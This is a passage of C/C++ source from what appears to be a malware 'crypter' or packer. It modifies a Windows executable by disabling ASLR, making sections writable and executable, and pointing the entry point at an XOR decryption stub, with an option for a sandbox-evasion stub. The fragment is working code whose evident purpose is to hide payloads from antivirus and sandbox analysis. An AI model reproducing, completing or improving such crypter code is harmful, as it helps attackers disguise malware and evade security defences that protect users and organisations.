			MYPRINTF("problem with injection\n");
			delete Crypter::section;
			return false;
		}
	}

	free(fileBuffer);

	fileBuffer = (LPBYTE)resDll;

	dosHeader = (PIMAGE_DOS_HEADER) fileBuffer;
	// check if it is valid PE, i would say that this is merely a proper check, for a proper one you would need to calculate all the RVA's and see if they are valid
	if(dosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		MYPRINTF("IMAGE_DOS_SIGNATURE\n");
		delete Crypter::section;
		return false;
	}

	ntHeaders = (PIMAGE_NT_HEADERS) (fileBuffer + dosHeader->e_lfanew);
	if(ntHeaders->Signature != IMAGE_NT_SIGNATURE) {
		MYPRINTF("IMAGE_NT_SIGNATURE\n");
		delete Crypter::section;
		return false;
	}
	ntHeaders->OptionalHeader.DllCharacteristics = ntHeaders->OptionalHeader.DllCharacteristics & ~IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE;

	sectionHeader = (PIMAGE_SECTION_HEADER) SECHDROFFSET(fileBuffer);
	while(memcmp(sectionHeader->Name, Crypter::section, strlen(Crypter::section))) // get the ".fpbcfg" section header
		sectionHeader++;

	sectionHeader->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE; 
	// R/W/E, executable code, initialized data. although my experience shows that you are just fine with R/W...
	if (Crypter::evadeSandbox){
		ntHeaders->OptionalHeader.AddressOfEntryPoint = sectionHeader->VirtualAddress + ((DWORD)_stub_evade_sandbox - (DWORD)_xor_block_evade_sandbox);
	} else {
		ntHeaders->OptionalHeader.AddressOfEntryPoint = sectionHeader->VirtualAddress + ((DWORD)_stub - (DWORD)_xor_block);
	}
	

	sectionHeader = (PIMAGE_SECTION_HEADER) SECHDROFFSET(fileBuffer);
	while(memcmp(sectionHeader->Name, TEXT_SECTION, strlen(TEXT_SECTION))) // get the ".text" section header
		sectionHeader++;

	sectionHeader->Characteristics = IMAGE_SCN_CNT_CODE | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE; 
	// R/W/E, executable code, initialized data. although my experience shows that you are just fine with R/W...

	bool res = true;
	if (!Crypter::saveFile(outfile, resDll, szResDll)){
		res = false;
		MYPRINTF("Unable to save file\n");
	}

	free(fileBuffer);
	delete Crypter::section;

	return res;
}